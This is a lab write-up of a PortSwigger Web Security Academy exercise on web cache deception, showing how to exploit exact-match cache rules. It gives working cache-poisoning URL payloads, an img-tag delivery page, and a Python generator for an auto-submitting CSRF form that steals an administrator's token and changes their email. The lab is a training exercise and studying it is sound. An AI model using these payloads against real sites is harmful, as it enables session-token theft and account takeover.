
Web Cache Deception – Exploiting Exact-Match Cache Rules (Expert Level)
Prerequisites
To complete this lab, ensure you have:
- A PortSwigger Web Security Academy account
- Burp Suite (Community or Professional edition)
- A proxy extension like FoxyProxy configured in your browser
- JavaScript enabled in your browser
- Familiarity with web caching mechanisms, HTTP, HTML, and CSRF concepts
Labs Covered
This write-up focuses on the following EXPERT-level lab from the PortSwigger Web Security Academy:
Lab: Exploiting exact-match cache rules for web cache deception
This lab demonstrates how attackers can abuse exact-match cache rules to trick a cache into storing responses that contain sensitive user data.
Lab Description
Overview: Exploiting File Name Cache Rules
Certain resources, such as `robots.txt`, `favicon.ico`, and `index.html`, are often cached using exact-match filename rules. An attacker can exploit discrepancies in how the cache and the origin server interpret URLs to expose or cache sensitive user data.
Detecting Normalization Discrepancies
To understand whether the cache and origin server treat paths differently:
- Try requests like `/aaa%2f%2e%2e%2frobots.txt`
- Observe caching headers (`X-Cache: hit` / `X-Cache: miss`)

If the origin doesn't normalize paths but the cache does, this discrepancy can be abused.
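The discrepancy above can be sketched in a few lines of Python; `cache_view` and `origin_view` are hypothetical models of the two components' behaviour in this lab, not real cache code:

```python
from urllib.parse import unquote
import posixpath

def cache_view(path: str) -> str:
    """Hypothetical cache: URL-decodes, then resolves dot-segments
    before matching its exact-match file rules (assumed behaviour)."""
    return posixpath.normpath(unquote(path))

def origin_view(path: str) -> str:
    """Hypothetical origin: routes on the raw path with no decoding
    and no dot-segment resolution (assumed behaviour)."""
    return path

crafted = "/aaa%2f%2e%2e%2frobots.txt"
print(cache_view(crafted))   # /robots.txt -> the exact-match rule fires
print(origin_view(crafted))  # raw path    -> no such route on the origin
```

If the two views disagree like this, the cache can be made to store a response under a key the origin never actually served.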
Exploiting the Lab
Step 1 – Identify Sensitive Endpoints
Log in with the credentials `wiener:peter` and change your email address. Observe the CSRF token in the `/my-account` response.
Step 2 – Investigate Path Discrepancies
Test variants of `/my-account` using unusual path syntax, for example:
- `/my-account/hanzala`
- `/my-accounthanzala`

Run Intruder tests using various delimiters such as `;`, `?`, and `%2f`. Observe the responses and note which variants still return 200.
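The Intruder payload set can be sketched as a small generator; the delimiter list and the `hanzala.js` suffix are illustrative choices carried over from the examples above:

```python
# Candidate delimiter characters to test (an illustrative set, not
# an exhaustive one; Burp ships a larger built-in delimiter list).
delimiters = [";", "?", "#", "%2f", "%00", "%0a", ".", ","]

def variants(base: str, suffix: str = "hanzala.js") -> list[str]:
    """Build candidate URLs: base + delimiter + arbitrary suffix.
    A variant that still returns 200 suggests the origin discards
    everything after that delimiter when routing."""
    return [f"{base}{d}{suffix}" for d in delimiters]

for url in variants("/my-account"):
    print(url)  # send each via Repeater/Intruder and record the status codes
```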
Step 3 – Check Caching Behavior
Requests such as:
- `/my-account;hanzala.js`
- `/my-account?hanzala.js`

return 200 but are not cached (no `X-Cache: hit` on repeat requests).
Step 4 – Test Normalization Discrepancy
- Try `/aa/..%2fmy-account` → 404. The origin server does not resolve dot-segments.

Now test `/robots.txt`:
- The first request shows `X-Cache: miss`
- A second request shows `X-Cache: hit`, indicating the response was cached
Try `/aaa/..%2frobots.txt`: it returns the cached `robots.txt` content with `X-Cache: hit`, which shows that the cache decodes the path and resolves dot-segments before matching its exact-match rules.
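A minimal sketch of the hit/miss check, assuming the cache exposes an `X-Cache` header as in this lab (other caches use different header names, such as `CF-Cache-Status`):

```python
def is_cached(first: dict, second: dict) -> bool:
    """Heuristic: a resource is cacheable if an identical repeat request
    flips X-Cache from miss to hit. `first` and `second` stand in for
    the response headers of two back-to-back requests."""
    return (first.get("X-Cache", "").lower() == "miss"
            and second.get("X-Cache", "").lower() == "hit")

# Simulated header pairs matching what the lab shows:
print(is_cached({"X-Cache": "miss"}, {"X-Cache": "hit"}))   # True  (/robots.txt)
print(is_cached({"X-Cache": "miss"}, {"X-Cache": "miss"}))  # False (/my-account)
```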
Step 5 – Poison the Cache
Send a crafted request:
`/my-account;%2f%2e%2e%2frobots.txt`

The origin server treats `;` as a path delimiter, so it routes the request to `/my-account` and serves your account page. The cache does not use `;` as a delimiter: it decodes the path to `/my-account;/../robots.txt`, resolves the dot-segments to `/robots.txt`, and applies its exact-match rule. The first request shows `X-Cache: miss`; resend it and you get `X-Cache: hit`. The response includes sensitive data (your CSRF token), which is now cached.
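Why this payload works can be modelled in a few lines; `origin_route` and `cache_key` are hypothetical stand-ins for how the two components parse the same path:

```python
from urllib.parse import unquote
import posixpath

PAYLOAD = "/my-account;%2f%2e%2e%2frobots.txt"

def origin_route(path: str) -> str:
    """Hypothetical origin: treats ';' as a path-parameter delimiter
    (Java/Spring-style), so everything after it is dropped."""
    return path.split(";", 1)[0]

def cache_key(path: str) -> str:
    """Hypothetical cache: no ';' handling; decodes and resolves
    dot-segments before matching its exact-match rules."""
    return posixpath.normpath(unquote(path))

print(origin_route(PAYLOAD))  # /my-account -> personalized account page served
print(cache_key(PAYLOAD))     # /robots.txt -> exact-match rule fires, response cached
```

The same response is therefore a private account page to the origin and a public static file to the cache, which is the core of the deception.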
Step 6 – Deliver Exploit to Victim
On the exploit server, host a page that makes the victim request the poisoned path on the lab. Use the lab's absolute URL in the `src` attribute (the relative path below is shown for brevity):
<img src="/my-account;%2f%2e%2e%2frobots.txt?wc" />
The `?wc` query string is a cache buster, ensuring the victim's request creates a fresh cache entry rather than hitting the one you already populated. Note that if the victim's session cookie is not sent with a cross-site image request (for example due to SameSite cookie restrictions), a top-level navigation such as setting `document.location` to the poisoned URL achieves the same effect.

When the administrator loads this URL, their own account response, including their CSRF token, gets stored in the cache. Verify this by resending the same request (with the same cache buster) yourself and reading the token from the cached response.
Step 7 – Craft and Send CSRF Exploit
In Burp, copy the request that changes the email address and replace your CSRF token with the one stolen from the cache. Generate the CSRF HTML (for example with Burp Suite Professional's "Generate CSRF PoC" engagement tool, or by writing the auto-submitting form by hand), paste it into the exploit server's body, and deliver the payload to the victim again. Once the administrator's email address is changed, the lab is solved.
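If you build the PoC by hand, it is just an auto-submitting form. A sketch of generating it in Python follows; the `/my-account/change-email` endpoint and the `email`/`csrf` field names are assumptions based on a typical lab request, so match them to what you captured in Burp:

```python
def csrf_poc(lab_url: str, stolen_token: str, new_email: str) -> str:
    """Build an auto-submitting CSRF form (endpoint and field names
    are assumed; verify against the captured change-email request)."""
    return f"""<form action="{lab_url}/my-account/change-email" method="POST">
  <input type="hidden" name="email" value="{new_email}">
  <input type="hidden" name="csrf" value="{stolen_token}">
</form>
<script>document.forms[0].submit();</script>"""

html = csrf_poc("https://YOUR-LAB-ID.web-security-academy.net",
                "STOLEN-TOKEN", "attacker@evil.example")
print(html)  # paste this into the exploit server body
```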
Conclusion
This lab demonstrates how a mismatch between how the origin server and the cache handle exact-match filenames can be exploited to store and reuse user-specific content. By targeting endpoints covered by exact-match rules, such as `robots.txt`, and tricking the cache into storing personalized responses, an attacker can stage highly effective CSRF attacks.